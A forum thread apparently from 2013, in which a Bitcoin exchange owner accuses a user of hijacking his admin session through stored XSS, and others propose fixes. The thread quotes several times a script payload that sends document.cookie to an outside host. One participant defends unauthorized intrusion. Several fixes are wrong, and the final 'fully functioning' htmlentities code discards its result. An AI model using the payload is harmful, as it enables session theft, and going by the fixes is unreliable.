SCAMMER TradeFortress P-T'ed my site without permission, no damage afaik. CLOSED

[MoneypakTrader.com]

UPDATE 6/3 SOLVED, no more entries will be reviewed.

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substition blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.
SOLVED

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
Your ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

[...]

[...]

Scammer/Hacker wannabe TF hijacked an admin session via a sql injection directing the admin cookie to his site (code at bottom of post).
His Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com

There was a few minutes that Scammer/Hacker TF had access to the admin panel.
Fortunately, none of the info there is too bad and this piece of shit might not invade the privacy of the users.

UPDATE: It appears only limited, session information was stolen:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

[mprep]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

[MoneypakTrader.com]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

[mprep]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

You clearly are in rage (and in a lot of psychological pain I suppose). Relax because you're trying to tear down a building with a stick.

[The 4ner]

Man this is a heavy accusation. Second accusation I've seen against TF since last month.

[mprep]

Man this is a heavy accusation. Second accusation I've seen against TF since last month.

Yeah, I noticed too. It's kind of beginning to annoy me. He seems to have some kind of serious hatred for TradeFortress.

[MoneypakTrader.com]

Who made the other accusation? Links will help counter troll mprep

[ironcross360]

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substition blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
Your ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

Which programmer did you pay? [Either I didn't code that part of your site or my code really is shit], security vulnerability:

[I can't see the code, but did get read/write access to the db, but don't know how the new storage system is named so can't do the bitcoin redirection I attempted]

Scammer/Hacker wannabe attempted to divert deposits from the site, using an aparently custom address for the attempted theft:
Fortunately, he knew so little of the code, he only managed to rewrite his personal deposit address to: 1KentoeyU1VuoD4oCBsnTm3yTXksGRiWww
Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com
Password Hash was destroyed unfortunately in a hurried attempt to block the hacker.

People may presume the possibility that Scammer/Hacker accessed all the account info generally visible about user account.
Fortunately, none of the info required is too bad and this piece of shit might not invade the privacy of these users (lawsuits are valid against him if he does so).

UPDATE: It appears only limited, session information was stolen, could use help minimizing this damage in the future:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

Maybe you shouldnt have hacked him first.

[mprep]

Who made the other accusation? Links will help counter troll mprep

Dude, what's your problem? You seem to be full of hatred to everyone. And that's just my opinion that I'm not forcing on to you. I tell what I think and I don't give a damn if you like or care about it or not. You should sit down, relax and stop attacking everyone who's not with you. If I wanted to fight against you, I would've made a separate thread.

[MoneypakTrader.com]

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

[mprep]

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

Understood. I wish you good luck in your further pursuits if they are honorable and fair. I don't even want to get between the conflict (or dispute, whatever you call it) with you and TradeFortress.

[MoneypakTrader.com]

Here is his messages in the site that lead to the PHPSESSID HACK
Jun 1, 09:17:41 foobar
Message: So what do I do now? Do I get moneypak codes ? Do I get bitcoin? do I get balance to my debit card? what is your service
Jun 1, 09:16:29 foobar
Message: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
Jun 1, 09:02:38 foobar
Message: <b>foo</b>
Jun 1, 09:02:29 foobar
Message: how does this work

[MagicBit15]

Why are you getting hacked so much?

Social engineering or are you just coding that poorly and not debugging properly before you launch?

[wachtwoord]

I PM'ed this but MPT asked to post it here instead:

Hey,

You asked to fix the following code:

Code:

while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

Code:

if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Doe you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.

If I misunderstood and you mean something else altogether, please clarify

Regards

[MoneypakTrader.com]

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?

The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

It's more like hundreds of BTC, but same difference.

[MoneypakTrader.com]

I PM'ed this but MPT asked to post it here instead:

Hey,
You asked to fix the following code:

Code:

while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

Code:

if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Doe you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.
If I misunderstood and you mean something else altogether, please clarify
Regards

Looks like stripslashes doesn't block opening a line of code, does it?

[MagicBit15]

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?

The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

It's more like hundreds of BTC, but same difference.

Ah I see that sucks, No way you can contact him? Or is he not responding at all, email or skype or anything?

[🏰 TradeFortress 🏰]

LOL? Prove that I have "changed my deposit address", that was the auto generated one. You can't even change it, bitcoind or Blockchain.info doesn't let you. It looks like a vanity address through  

Anyway, show me the damages I've done to you. Which is nothing other than your sites relutation, which I think is fair - an eye for an eye. I regularly try to break into sites, and I always disclose it to the owners without any malicious damages done. For some people, I do it publicly.

Here: htmlentities( [db output] ). It's funny how there is so many responses yet no one knows basic web security.

[🏰 TradeFortress 🏰]

Thanks for advertising my pentesting skills too!

[danieldaniel]

All you have to do is htmlentities(<data that you want to clean>);

Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit:
Fully functioning code:
-Start-
while ($xyz = $mnop->fetch()) {
htmlentities($xyz);
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
-End-